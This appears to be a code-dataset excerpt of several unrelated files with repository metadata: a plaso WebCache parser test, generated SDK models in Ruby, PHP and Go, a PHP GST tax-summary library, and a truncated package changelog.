            'C:\\Users\\test\\AppData\\Local\\Microsoft\\Windows\\'
            'INetCache\\IE\\'),
        'name': 'Content',
        'set_identifier': 0,
        'timestamp_desc': definitions.TIME_DESCRIPTION_LAST_ACCESS}

    self.CheckEventValues(storage_writer, events[573], expected_event_values)

  def testProcessOnDatabaseWithPartitionsExTable(self):
    """Tests the Process function on database with a PartitionsEx table."""
    plugin = msie_webcache.MsieWebCacheESEDBPlugin()
    storage_writer = self._ParseESEDBFileWithPlugin(
        ['PartitionsEx-WebCacheV01.dat'], plugin)

    self.assertEqual(storage_writer.number_of_events, 4200)
    self.assertEqual(storage_writer.number_of_extraction_warnings, 3)
    self.assertEqual(storage_writer.number_of_recovery_warnings, 0)

    # The order in which ESEDBPlugin._GetRecordValues() generates events is
    # nondeterministic hence we sort the events.
    events = list(storage_writer.GetSortedEvents())

    # Spot-check a single cache-entry event from the sorted stream.
    expected_event_values = {
        'access_count': 5,
        'cache_identifier': 0,
        'cached_file_size': 726,
        'cached_filename': 'b83d57c0[1].svg',
        'container_identifier': 14,
        'data_type': 'msie:webcache:container',
        'date_time': '2019-03-20 17:22:14.0000000',
        'entry_identifier': 63,
        'sync_count': 0,
        'response_headers': (
            '[HTTP/1.1 200; content-length: 726; content-type: image/svg+xml; '
            'x-cache: TCP_HIT; x-msedge-ref: Ref A: 3CD5FCBC8EAD4E0A80FA41A62'
            'FBC8CCC Ref B: PRAEDGE0910 Ref C: 2019-12-16T20:55:28Z; date: '
            'Mon, 16 Dec 2019 20:55:28 GMT]'),
        'timestamp_desc': definitions.TIME_DESCRIPTION_MODIFICATION,
        'url': 'https://www.bing.com/rs/3R/kD/ic/878ca0cd/b83d57c0.svg'}

    self.CheckEventValues(storage_writer, events[100], expected_event_values)
# Allow running the tests in this module directly.
if __name__ == '__main__':
  unittest.main()
|
Python
|
Apache-2.0
|
ColdSmoke627/plaso/tests/parsers/esedb_plugins/msie_webcache.py
|
2bf58674-eadf-464d-980d-8a843399c181
|
[]
|
[]
|
=begin
#Cisco Intersight
#Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. This document was created on 2021-10-20T11:22:53Z.
The version of the OpenAPI document: 1.0.9-4870
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.3.1
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for IntersightClient::KubernetesConfigResultListAllOf
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe IntersightClient::KubernetesConfigResultListAllOf do
  # Fresh, empty model instance shared by the examples below.
  let(:instance) { IntersightClient::KubernetesConfigResultListAllOf.new }

  # The generated model should at least be constructible.
  describe 'test an instance of KubernetesConfigResultListAllOf' do
    it 'should create an instance of KubernetesConfigResultListAllOf' do
      expect(instance).to be_instance_of(IntersightClient::KubernetesConfigResultListAllOf)
    end
  end

  # Placeholder generated examples for each model attribute.
  describe 'test attribute "count"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "results"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end
end
|
Ruby
|
Apache-2.0
|
xlab-si/intersight-sdk-ruby/spec/models/kubernetes_config_result_list_all_of_spec.rb
|
68e540f7-1f5f-4e34-badd-1c96aea1d6ac
|
[{"tag": "EMAIL", "value": "intersight@cisco.com", "start": 1797, "end": 1817, "context": "sion of the OpenAPI document: 1.0.9-4870\nContact: intersight@cisco.com\nGenerated by: https://openapi-generator.tech\nOpen"}]
|
[{"tag": "EMAIL", "value": "intersight@cisco.com", "start": 1797, "end": 1817, "context": "sion of the OpenAPI document: 1.0.9-4870\nContact: intersight@cisco.com\nGenerated by: https://openapi-generator.tech\nOpen"}]
|
<?php
/**
* PickListItemModel
*
* PHP version 5
*
* @category Class
* @package FrankHouweling\AzureDevOpsClient\ProcessDefinitions
* @author Swagger Codegen team
* @link https://github.com/swagger-api/swagger-codegen
*/
/**
* WorkItemTracking
*
* No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
*
* OpenAPI spec version: 4.1-preview
* Contact: nugetvss@microsoft.com
* Generated by: https://github.com/swagger-api/swagger-codegen.git
* Swagger Codegen version: 2.4.11-SNAPSHOT
*/
/**
* NOTE: This class is auto generated by the swagger code generator program.
* https://github.com/swagger-api/swagger-codegen
* Do not edit the class manually.
*/
namespace FrankHouweling\AzureDevOpsClient\ProcessDefinitions\Model;
use \ArrayAccess;
use \FrankHouweling\AzureDevOpsClient\ProcessDefinitions\ObjectSerializer;
/**
* PickListItemModel Class Doc Comment
*
* @category Class
* @description
* @package FrankHouweling\AzureDevOpsClient\ProcessDefinitions
* @author Swagger Codegen team
* @link https://github.com/swagger-api/swagger-codegen
*/
class PickListItemModel implements ModelInterface, ArrayAccess
{
    const DISCRIMINATOR = null;

    /**
     * Original (wire) name of the model.
     *
     * @var string
     */
    protected static $swaggerModelName = 'PickListItemModel';

    /**
     * Property name => swagger type, used for (de)serialization.
     *
     * @var string[]
     */
    protected static $swaggerTypes = [
        'id' => 'string',
        'value' => 'string'
    ];

    /**
     * Property name => swagger format, used for (de)serialization.
     *
     * @var string[]
     */
    protected static $swaggerFormats = [
        'id' => 'uuid',
        'value' => null
    ];

    /**
     * Local attribute name => original (wire) name.
     *
     * @var string[]
     */
    protected static $attributeMap = [
        'id' => 'id',
        'value' => 'value'
    ];

    /**
     * Attribute name => setter method (used when deserializing responses).
     *
     * @var string[]
     */
    protected static $setters = [
        'id' => 'setId',
        'value' => 'setValue'
    ];

    /**
     * Attribute name => getter method (used when serializing requests).
     *
     * @var string[]
     */
    protected static $getters = [
        'id' => 'getId',
        'value' => 'getValue'
    ];

    /**
     * Property values, keyed by local attribute name.
     *
     * @var mixed[]
     */
    protected $container = [];

    /**
     * Property name => swagger type map.
     *
     * @return array
     */
    public static function swaggerTypes()
    {
        return self::$swaggerTypes;
    }

    /**
     * Property name => swagger format map.
     *
     * @return array
     */
    public static function swaggerFormats()
    {
        return self::$swaggerFormats;
    }

    /**
     * Local attribute name => wire name map.
     *
     * @return array
     */
    public static function attributeMap()
    {
        return self::$attributeMap;
    }

    /**
     * Attribute name => setter method map.
     *
     * @return array
     */
    public static function setters()
    {
        return self::$setters;
    }

    /**
     * Attribute name => getter method map.
     *
     * @return array
     */
    public static function getters()
    {
        return self::$getters;
    }

    /**
     * The original name of the model.
     *
     * @return string
     */
    public function getModelName()
    {
        return self::$swaggerModelName;
    }

    /**
     * Constructor.
     *
     * @param mixed[] $data Associative array of initial property values;
     *                      missing keys default to null.
     */
    public function __construct(array $data = null)
    {
        foreach (array_keys(self::$attributeMap) as $property) {
            $this->container[$property] = isset($data[$property]) ? $data[$property] : null;
        }
    }

    /**
     * List all invalid properties with reasons.
     *
     * This model declares no constraints, so the list is always empty.
     *
     * @return array invalid properties with reasons
     */
    public function listInvalidProperties()
    {
        return [];
    }

    /**
     * Validate all properties in the model.
     *
     * @return bool True when no property is invalid
     */
    public function valid()
    {
        return count($this->listInvalidProperties()) === 0;
    }

    /**
     * Gets id.
     *
     * @return string
     */
    public function getId()
    {
        return $this->container['id'];
    }

    /**
     * Sets id.
     *
     * @param string $id id
     *
     * @return $this
     */
    public function setId($id)
    {
        $this->container['id'] = $id;
        return $this;
    }

    /**
     * Gets value.
     *
     * @return string
     */
    public function getValue()
    {
        return $this->container['value'];
    }

    /**
     * Sets value.
     *
     * @param string $value value
     *
     * @return $this
     */
    public function setValue($value)
    {
        $this->container['value'] = $value;
        return $this;
    }

    /**
     * Whether the given offset exists (ArrayAccess).
     *
     * @param integer $offset Offset
     *
     * @return boolean
     */
    public function offsetExists($offset)
    {
        return isset($this->container[$offset]);
    }

    /**
     * Gets the value at the given offset, or null when absent (ArrayAccess).
     *
     * @param integer $offset Offset
     *
     * @return mixed
     */
    public function offsetGet($offset)
    {
        return $this->offsetExists($offset) ? $this->container[$offset] : null;
    }

    /**
     * Sets a value at the given offset; a null offset appends (ArrayAccess).
     *
     * @param integer $offset Offset
     * @param mixed   $value  Value to be set
     *
     * @return void
     */
    public function offsetSet($offset, $value)
    {
        if (is_null($offset)) {
            $this->container[] = $value;
        } else {
            $this->container[$offset] = $value;
        }
    }

    /**
     * Unsets the given offset (ArrayAccess).
     *
     * @param integer $offset Offset
     *
     * @return void
     */
    public function offsetUnset($offset)
    {
        unset($this->container[$offset]);
    }

    /**
     * JSON representation of the object (pretty-printed when supported).
     *
     * @return string
     */
    public function __toString()
    {
        $payload = ObjectSerializer::sanitizeForSerialization($this);
        if (defined('JSON_PRETTY_PRINT')) { // use JSON pretty print
            return json_encode($payload, JSON_PRETTY_PRINT);
        }
        return json_encode($payload);
    }
}
|
PHP
|
MIT
|
FrankHouweling/AzureDevOpsClient/lib/AzureDevOpsClient/ProcessDefinitions/Model/PickListItemModel.php
|
6ad50af0-39fc-4ecf-bde1-da5aac36e60a
|
[{"tag": "EMAIL", "value": "nugetvss@microsoft.com", "start": 421, "end": 443, "context": "\n * OpenAPI spec version: 4.1-preview\n * Contact: nugetvss@microsoft.com\n * Generated by: https://github.com/swagger-api/s"}]
|
[{"tag": "EMAIL", "value": "nugetvss@microsoft.com", "start": 421, "end": 443, "context": "\n * OpenAPI spec version: 4.1-preview\n * Contact: nugetvss@microsoft.com\n * Generated by: https://github.com/swagger-api/s"}]
|
// Code generated by smithy-go-codegen DO NOT EDIT.
package managedblockchain
import (
"context"
"fmt"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/aws-sdk-go-v2/service/managedblockchain/types"
smithy "github.com/awslabs/smithy-go"
"github.com/awslabs/smithy-go/middleware"
smithyhttp "github.com/awslabs/smithy-go/transport/http"
)
// Creates a proposal for a change to the network that other members of the network
// can vote on, for example, a proposal to add a new member to the network. Any
// member can create a proposal.
//
// NOTE: auto-generated operation wrapper. The middleware registrations below
// are order-sensitive (serde, signing, retry, idempotency-token auto-fill,
// validation); do not reorder them by hand.
func (c *Client) CreateProposal(ctx context.Context, params *CreateProposalInput, optFns ...func(*Options)) (*CreateProposalOutput, error) {
	stack := middleware.NewStack("CreateProposal", smithyhttp.NewStackRequest)
	// Start from a copy of the client options and apply per-call overrides.
	options := c.options.Copy()
	for _, fn := range optFns {
		fn(&options)
	}
	addawsRestjson1_serdeOpCreateProposalMiddlewares(stack)
	awsmiddleware.AddRequestInvocationIDMiddleware(stack)
	smithyhttp.AddContentLengthMiddleware(stack)
	addResolveEndpointMiddleware(stack, options)
	v4.AddComputePayloadSHA256Middleware(stack)
	addRetryMiddlewares(stack, options)
	addHTTPSignerV4Middleware(stack, options)
	awsmiddleware.AddAttemptClockSkewMiddleware(stack)
	addClientUserAgent(stack)
	smithyhttp.AddErrorCloseResponseBodyMiddleware(stack)
	smithyhttp.AddCloseResponseBodyMiddleware(stack)
	addIdempotencyToken_opCreateProposalMiddleware(stack, options)
	addOpCreateProposalValidationMiddleware(stack)
	stack.Initialize.Add(newServiceMetadataMiddleware_opCreateProposal(options.Region), middleware.Before)
	addRequestIDRetrieverMiddleware(stack)
	addResponseErrorMiddleware(stack)
	// Caller-supplied stack mutations run last; any error aborts the call.
	for _, fn := range options.APIOptions {
		if err := fn(stack); err != nil {
			return nil, err
		}
	}
	handler := middleware.DecorateHandler(smithyhttp.NewClientHandler(options.HTTPClient), stack)
	result, metadata, err := handler.Handle(ctx, params)
	if err != nil {
		// Wrap transport/serde failures with service and operation context.
		return nil, &smithy.OperationError{
			ServiceID:     ServiceID,
			OperationName: "CreateProposal",
			Err:           err,
		}
	}
	out := result.(*CreateProposalOutput)
	out.ResultMetadata = metadata
	return out, nil
}
// CreateProposalInput is the request payload for the CreateProposal operation.
type CreateProposalInput struct {
	// The type of actions proposed, such as inviting a member or removing a member.
	// The types of Actions in a proposal are mutually exclusive. For example, a
	// proposal with Invitations actions cannot also contain Removals actions.
	//
	// This member is required.
	Actions *types.ProposalActions

	// A unique, case-sensitive identifier that you provide to ensure the idempotency
	// of the operation. An idempotent operation completes no more than one time. This
	// identifier is required only if you make a service request directly using an HTTP
	// client. It is generated automatically if you use an AWS SDK or the AWS CLI.
	// (When unset, this SDK's idempotency-token middleware fills it in.)
	//
	// This member is required.
	ClientRequestToken *string

	// The unique identifier of the member that is creating the proposal. This
	// identifier is especially useful for identifying the member making the proposal
	// when multiple members exist in a single AWS account.
	//
	// This member is required.
	MemberId *string

	// The unique identifier of the network for which the proposal is made.
	//
	// This member is required.
	NetworkId *string

	// A description for the proposal that is visible to voting members, for example,
	// "Proposal to add Example Corp. as member."
	Description *string
}
// CreateProposalOutput is the response payload for the CreateProposal operation.
type CreateProposalOutput struct {
	// The unique identifier of the proposal.
	ProposalId *string

	// Metadata pertaining to the operation's result.
	ResultMetadata middleware.Metadata
}
// addawsRestjson1_serdeOpCreateProposalMiddlewares registers the REST-JSON
// serializer and deserializer for the CreateProposal operation on the stack.
func addawsRestjson1_serdeOpCreateProposalMiddlewares(stack *middleware.Stack) {
	stack.Serialize.Add(&awsRestjson1_serializeOpCreateProposal{}, middleware.After)
	stack.Deserialize.Add(&awsRestjson1_deserializeOpCreateProposal{}, middleware.After)
}
// idempotencyToken_initializeOpCreateProposal is an initialize-phase
// middleware that auto-fills CreateProposalInput.ClientRequestToken.
type idempotencyToken_initializeOpCreateProposal struct {
	// tokenProvider generates tokens; nil disables auto-fill.
	tokenProvider IdempotencyTokenProvider
}
// ID returns the middleware's unique identifier within the stack.
func (*idempotencyToken_initializeOpCreateProposal) ID() string {
	return "OperationIdempotencyTokenAutoFill"
}
// HandleInitialize fills in CreateProposalInput.ClientRequestToken with a
// freshly generated idempotency token when the caller did not supply one,
// then invokes the next handler in the initialize chain.
func (m *idempotencyToken_initializeOpCreateProposal) HandleInitialize(ctx context.Context, in middleware.InitializeInput, next middleware.InitializeHandler) (
	out middleware.InitializeOutput, metadata middleware.Metadata, err error,
) {
	if m.tokenProvider == nil {
		// No provider configured; nothing to auto-fill.
		return next.HandleInitialize(ctx, in)
	}
	params, ok := in.Parameters.(*CreateProposalInput)
	if !ok {
		return out, metadata, fmt.Errorf("expected middleware input to be of type *CreateProposalInput ")
	}
	if params.ClientRequestToken == nil {
		token, tokenErr := m.tokenProvider.GetIdempotencyToken()
		if tokenErr != nil {
			return out, metadata, tokenErr
		}
		params.ClientRequestToken = &token
	}
	return next.HandleInitialize(ctx, in)
}
// addIdempotencyToken_opCreateProposalMiddleware installs the token
// auto-fill middleware using the provider configured on the client options.
func addIdempotencyToken_opCreateProposalMiddleware(stack *middleware.Stack, cfg Options) {
	stack.Initialize.Add(&idempotencyToken_initializeOpCreateProposal{tokenProvider: cfg.IdempotencyTokenProvider}, middleware.Before)
}
// newServiceMetadataMiddleware_opCreateProposal builds the service-metadata
// middleware (region, service ID, signing name) for this operation.
func newServiceMetadataMiddleware_opCreateProposal(region string) awsmiddleware.RegisterServiceMetadata {
	return awsmiddleware.RegisterServiceMetadata{
		Region:        region,
		ServiceID:     ServiceID,
		SigningName:   "managedblockchain",
		OperationName: "CreateProposal",
	}
}
|
GO
|
Apache-2.0
|
zparnold/aws-sdk-go-v2/service/managedblockchain/api_op_CreateProposal.go
|
7dc436c5-0f87-4c9b-90e1-6d8cfc674d5c
|
[]
|
[]
|
<?php defined('BASEPATH') or exit('No direct script access allowed');
/*
* ==============================================================================
* Author : Sheik
* Email : info@srampos.com
* For : SRAM POS
* Web : http://srammram.com
* ==============================================================================
*/
class Gst
{
    public function __construct() {
    }

    /**
     * Delegate unknown property reads to the framework super object so the
     * library can use $this->Settings, $this->sma, etc.
     */
    public function __get($var) {
        return get_instance()->$var;
    }

    /**
     * Build the tax-summary HTML for an invoice and (optionally) its return rows.
     *
     * @param array $rows        invoice item rows
     * @param array $return_rows return item rows, if any
     * @param mixed $product_tax total tax amount shown in the footer
     * @param bool  $onCost      use net_unit_cost instead of net_unit_price
     * @return string HTML, or '' when invoice_view is disabled or $rows is empty
     */
    function summary($rows = [], $return_rows = [], $product_tax = 0, $onCost = false) {
        $code = '';
        if ($this->Settings->invoice_view > 0 && !empty($rows)) {
            $tax_summary = $this->taxSummary($rows, $onCost);
            if (!empty($return_rows)) {
                $return_tax_summary = $this->taxSummary($return_rows, $onCost);
                // NOTE(review): '+' is an array union — a tax code present in
                // both summaries keeps only the sale-side entry; return-side
                // totals for that code are NOT merged in. Confirm whether this
                // is intentional before changing it.
                $tax_summary = $tax_summary + $return_tax_summary;
            }
            $code = $this->genHTML($tax_summary, $product_tax);
        }
        return $code;
    }

    /**
     * Aggregate item rows per tax code.
     *
     * Each entry accumulates items (quantity), tax, and amt (net amount after
     * item discount), and records name/code/rate from the first row seen.
     *
     * @param array $rows   item rows (objects with tax_code, unit_quantity, ...)
     * @param bool  $onCost use net_unit_cost instead of net_unit_price
     * @return array tax_code => summary row
     */
    function taxSummary($rows = [], $onCost = false) {
        $tax_summary = [];
        if (!empty($rows)) {
            foreach ($rows as $row) {
                if (isset($tax_summary[$row->tax_code])) {
                    $tax_summary[$row->tax_code]['items'] += $row->unit_quantity;
                    $tax_summary[$row->tax_code]['tax'] += $row->item_tax;
                    $tax_summary[$row->tax_code]['amt'] += ($row->unit_quantity * ($onCost ? $row->net_unit_cost : $row->net_unit_price)) - $row->item_discount;
                } else {
                    $tax_summary[$row->tax_code]['items'] = $row->unit_quantity;
                    $tax_summary[$row->tax_code]['tax'] = $row->item_tax;
                    $tax_summary[$row->tax_code]['amt'] = ($row->unit_quantity * ($onCost ? $row->net_unit_cost : $row->net_unit_price)) - $row->item_discount;
                    $tax_summary[$row->tax_code]['name'] = $row->tax_name;
                    $tax_summary[$row->tax_code]['code'] = $row->tax_code;
                    $tax_summary[$row->tax_code]['rate'] = $row->tax_rate;
                }
            }
        }
        return $tax_summary;
    }

    /**
     * Render the tax-summary table.
     *
     * Fixes malformed markup from the previous version: the header row was
     * closed with '</tr></td>' instead of '</tr></thead>', and the footer was
     * opened as '</tbody></tfoot>' instead of '</tbody><tfoot>', leaving the
     * total row outside any open tfoot element.
     *
     * @param array $tax_summary output of taxSummary()
     * @param mixed $product_tax total tax amount for the footer row
     * @return string HTML, or '' when $tax_summary is empty
     */
    function genHTML($tax_summary = [], $product_tax = 0) {
        $html = '';
        if (!empty($tax_summary)) {
            $html .= '<h4 style="font-weight:bold;">' . lang('tax_summary') . '</h4>';
            $html .= '<table class="table table-bordered table-striped print-table order-table table-condensed"><thead><tr><th>' . lang('name') . '</th><th>' . lang('code') . '</th><th>' . lang('qty') . '</th><th>' . lang('tax_excl') . '</th><th>' . lang('tax_amt') . '</th></tr></thead><tbody>';
            foreach ($tax_summary as $summary) {
                $html .= '<tr><td>' . $summary['name'] . '</td><td class="text-center">' . $summary['code'] . '</td><td class="text-center">' . $this->sma->formatQuantity($summary['items']) . '</td><td class="text-right">' . $this->sma->formatMoney($summary['amt']) . '</td><td class="text-right">' . $this->sma->formatMoney($summary['tax']) . '</td></tr>';
            }
            $html .= '</tbody><tfoot>';
            $html .= '<tr class="active"><th colspan="4" class="text-right">' . lang('total_tax_amount') . '</th><th class="text-right">' . $this->sma->formatMoney($product_tax) . '</th></tr>';
            $html .= '</tfoot></table>';
        }
        return $html;
    }

    /**
     * Split an item's tax into CGST/SGST (intra-state) or IGST (inter-state)
     * under the Indian GST scheme.
     *
     * NOTE: the misspelled method name ('calculte') is kept for backward
     * compatibility with existing callers.
     *
     * @param mixed  $item_tax    tax amount for the item
     * @param bool   $state       true for intra-state (CGST+SGST split)
     * @param object $tax_details tax rate row (->type, ->rate)
     * @return array gst/cgst/sgst/igst, or [] when indian_gst is disabled
     */
    function calculteIndianGST($item_tax, $state, $tax_details) {
        if ($this->Settings->indian_gst) {
            $cgst = $sgst = $igst = 0;
            if ($state) {
                // Intra-state: the rate is halved and the tax split 50/50.
                $gst = $tax_details->type == 1 ? $this->sma->formatDecimal(($tax_details->rate/2), 0).'%' : $this->sma->formatDecimal(($tax_details->rate/2), 0);
                $cgst = $this->sma->formatDecimal(($item_tax / 2), 4);
                $sgst = $this->sma->formatDecimal(($item_tax / 2), 4);
            } else {
                // Inter-state: the whole amount is IGST.
                $gst = $tax_details->type == 1 ? $this->sma->formatDecimal(($tax_details->rate), 0).'%' : $this->sma->formatDecimal(($tax_details->rate), 0);
                $igst = $item_tax;
            }
            return ['gst' => $gst, 'cgst' => $cgst, 'sgst' => $sgst, 'igst' => $igst];
        }
        return [];
    }

    /**
     * Indian state/UT code => name map.
     *
     * @param bool $blank prepend a "select" placeholder (stored under key 0,
     *                    since array_unshift assigns a numeric key)
     * @return array
     */
    function getIndianStates($blank = false) {
        $istates = [
            'AN' => 'Andaman & Nicobar',
            'AP' => 'Andhra Pradesh',
            'AR' => 'Arunachal Pradesh',
            'AS' => 'Assam',
            'BR' => 'Bihar',
            'CH' => 'Chandigarh',
            'CT' => 'Chhattisgarh',
            'DN' => 'Dadra and Nagar Haveli',
            'DD' => 'Daman & Diu',
            'DL' => 'Delhi',
            'GA' => 'Goa',
            'GJ' => 'Gujarat',
            'HR' => 'Haryana',
            'HP' => 'Himachal Pradesh',
            'JK' => 'Jammu & Kashmir',
            'JH' => 'Jharkhand',
            'KA' => 'Karnataka',
            'KL' => 'Kerala',
            'LD' => 'Lakshadweep',
            'MP' => 'Madhya Pradesh',
            'MH' => 'Maharashtra',
            'MN' => 'Manipur',
            'ML' => 'Meghalaya',
            'MZ' => 'Mizoram',
            'NL' => 'Nagaland',
            'OR' => 'Odisha',
            'PY' => 'Puducherry',
            'PB' => 'Punjab',
            'RJ' => 'Rajasthan',
            'SK' => 'Sikkim',
            'TN' => 'Tamil Nadu',
            'TR' => 'Tripura',
            'UK' => 'Uttarakhand',
            'UP' => 'Uttar Pradesh',
            'WB' => 'West Bengal',
        ];
        if ($blank) {
            array_unshift($istates, lang('select'));
        }
        return $istates;
    }
}
|
PHP
|
MIT
|
srammram/Bhaktamar/application/libraries/Gst.php
|
74a8813b-de64-4e23-97d2-513b5e6bbdf0
|
[{"tag": "NAME", "value": "Sheik", "start": 173, "end": 178, "context": "=================================\n * Author : Sheik\n * Email : info@srampos.com\n * For : "}, {"tag": "EMAIL", "value": "info@srampos.com", "start": 195, "end": 211, "context": "===========\n * Author : Sheik\n * Email : info@srampos.com\n * For : SRAM POS\n * Web : http://s"}]
|
[{"tag": "NAME", "value": "Sheik", "start": 173, "end": 178, "context": "=================================\n * Author : Sheik\n * Email : info@srampos.com\n * For : "}, {"tag": "EMAIL", "value": "info@srampos.com", "start": 195, "end": 211, "context": "===========\n * Author : Sheik\n * Email : info@srampos.com\n * For : SRAM POS\n * Web : http://s"}]
|
# @dusk-network/pagination
## 5.0.5
### Patch Changes
- 8bd8843d: Release
- Updated dependencies [8bd8843d]
- @dusk-network/icon@5.0.5
- @dusk-network/helpers@5.0.5
- @dusk-network/button@5.0.5
- @dusk-network/menu@5.0.5
## 5.0.4
### Patch Changes
- fc9a835e: Release
- Updated dependencies [fc9a835e]
- @dusk-network/icon@5.0.4
- @dusk-network/helpers@5.0.4
- @dusk-network/button@5.0.4
- @dusk-network/menu@5.0.4
## 5.0.3
### Patch Changes
- d19e01e9: Release
- Updated dependencies [d19e01e9]
- @dusk-network/icon@5.0.3
- @dusk-network/helpers@5.0.3
- @dusk-network/button@5.0.3
- @dusk-network/menu@5.0.3
## 5.0.2
### Patch Changes
- bd6220d3: Release
- Updated dependencies [bd6220d3]
- @dusk-network/icon@5.0.2
- @dusk-network/helpers@5.0.2
- @dusk-network/button@5.0.2
- @dusk-network/menu@5.0.2
## 5.0.1
### Patch Changes
- f47dbc9c: Release
- Updated dependencies [f47dbc9c]
- @dusk-network/icon@5.0.1
- @dusk-network/helpers@5.0.1
- @dusk-network/button@5.0.1
- @dusk-network/menu@5.0.1
## 5.0.0
### Minor Changes
- 5a02600a: Release
### Patch Changes
- Updated dependencies [5a02600a]
- @dusk-network/icon@5.0.0
- @dusk-network/helpers@5.0.0
- @dusk-network/button@5.0.0
- @dusk-network/menu@5.0.0
## 4.6.12
### Patch Changes
- 7e97eb52: Release 4.6.12
- Updated dependencies [7e97eb52]
- @dusk-network/icon@4.6.12
- @dusk-network/helpers@4.6.12
- @dusk-network/button@4.6.12
- @dusk-network/menu@4.6.12
## 4.6.11
### Patch Changes
- 771245ec: Release
- Updated dependencies [771245ec]
- @dusk-network/icon@4.6.11
- @dusk-network/helpers@4.6.11
- @dusk-network/button@4.6.11
- @dusk-network/menu@4.6.11
## 4.6.10
### Patch Changes
- 85081744: Release
- Updated dependencies [85081744]
- @dusk-network/icon@4.6.10
- @dusk-network/helpers@4.6.10
- @dusk-network/button@4.6.10
- @dusk-network/menu@4.6.10
## 4.6.9
### Patch Changes
- fe592f88: Release
- Updated dependencies [fe592f88]
- @dusk-network/icon@4.6.9
- @dusk-network/helpers@4.6.9
- @dusk-network/button@4.6.9
- @dusk-network/menu@4.6.9
## 4.6.8
### Patch Changes
- c33aa088: Release
- Updated dependencies [c33aa088]
- @dusk-network/icon@4.6.8
- @dusk-network/helpers@4.6.8
- @dusk-network/button@4.6.8
- @dusk-network/menu@4.6.8
## 4.6.7
### Patch Changes
- 5afbc274: Release
- Updated dependencies [5afbc274]
- @dusk-network/icon@4.6.7
- @dusk-network/helpers@4.6.7
- @dusk-network/button@4.6.7
- @dusk-network/menu@4.6.7
## 4.6.6
### Patch Changes
- a5caefeb: Release
- Updated dependencies [a5caefeb]
- @dusk-network/icon@4.6.6
- @dusk-network/helpers@4.6.6
- @dusk-network/button@4.6.6
- @dusk-network/menu@4.6.6
## 4.6.5
### Patch Changes
- 10b60c57: Release
- Updated dependencies [10b60c57]
- @dusk-network/icon@4.6.5
- @dusk-network/helpers@4.6.5
- @dusk-network/button@4.6.5
- @dusk-network/menu@4.6.5
## 4.6.4
### Patch Changes
- 8c74f26d: Release
- Updated dependencies [8c74f26d]
- @dusk-network/icon@4.6.4
- @dusk-network/helpers@4.6.4
- @dusk-network/button@4.6.4
- @dusk-network/menu@4.6.4
## 4.6.3
### Patch Changes
- 0dafd544: Release
- Updated dependencies [0dafd544]
- @dusk-network/icon@4.6.3
- @dusk-network/helpers@4.6.3
- @dusk-network/button@4.6.3
- @dusk-network/menu@4.6.3
## 4.6.2
### Patch Changes
- 182f1ea6: Release
- Updated dependencies [182f1ea6]
- @dusk-network/icon@4.6.2
- @dusk-network/helpers@4.6.2
- @dusk-network/button@4.6.2
- @dusk-network/menu@4.6.2
## 4.6.1
### Patch Changes
- 88042090: Release
- Updated dependencies [88042090]
- @dusk-network/icon@4.6.1
- @dusk-network/helpers@4.6.1
- @dusk-network/button@4.6.1
- @dusk-network/menu@4.6.1
## 4.6.0
### Minor Changes
- 9320f3b5: Release
### Patch Changes
- Updated dependencies [9320f3b5]
- @dusk-network/icon@4.6.0
- @dusk-network/helpers@4.6.0
- @dusk-network/button@4.6.0
- @dusk-network/menu@4.6.0
## 4.5.6
### Patch Changes
- 80a609dd: Release
- Updated dependencies [80a609dd]
- @dusk-network/icon@4.5.6
- @dusk-network/helpers@4.5.6
- @dusk-network/button@4.5.6
- @dusk-network/menu@4.5.6
## 4.5.5
### Patch Changes
- d326f7f0: Release
- Updated dependencies [d326f7f0]
- @dusk-network/icon@4.5.5
- @dusk-network/helpers@4.5.5
- @dusk-network/button@4.5.5
- @dusk-network/menu@4.5.5
## 4.5.4
### Patch Changes
- bfca367b: Release
- Updated dependencies [bfca367b]
- @dusk-network/icon@4.5.4
- @dusk-network/helpers@4.5.4
- @dusk-network/button@4.5.4
- @dusk-network/menu@4.5.4
## 4.5.3
### Patch Changes
- 55558e72: Release
- Updated dependencies [55558e72]
- @dusk-network/icon@4.5.3
- @dusk-network/helpers@4.5.3
- @dusk-network/button@4.5.3
- @dusk-network/menu@4.5.3
## 4.5.2
### Patch Changes
- b252568f: Release
- Updated dependencies [b252568f]
- @dusk-network/icon@4.5.2
- @dusk-network/helpers@4.5.2
- @dusk-network/button@4.5.2
- @dusk-network/menu@4.5.2
## 4.5.1
### Patch Changes
- bf08b6df: Release
- Updated dependencies [bf08b6df]
- @dusk-network/icon@4.5.1
- @dusk-network/helpers@4.5.1
- @dusk-network/button@4.5.1
- @dusk-network/menu@4.5.1
## 4.5.0
### Minor Changes
- 023ecf0d: Release
### Patch Changes
- Updated dependencies [023ecf0d]
- @dusk-network/icon@4.5.0
- @dusk-network/helpers@4.5.0
- @dusk-network/button@4.5.0
- @dusk-network/menu@4.5.0
## 4.4.0
### Minor Changes
- ca37e869: Release 4.3.0
### Patch Changes
- Updated dependencies [ca37e869]
- @dusk-network/icon@4.4.0
- @dusk-network/helpers@4.4.0
- @dusk-network/button@4.4.0
- @dusk-network/menu@4.4.0
## 4.3.1
### Patch Changes
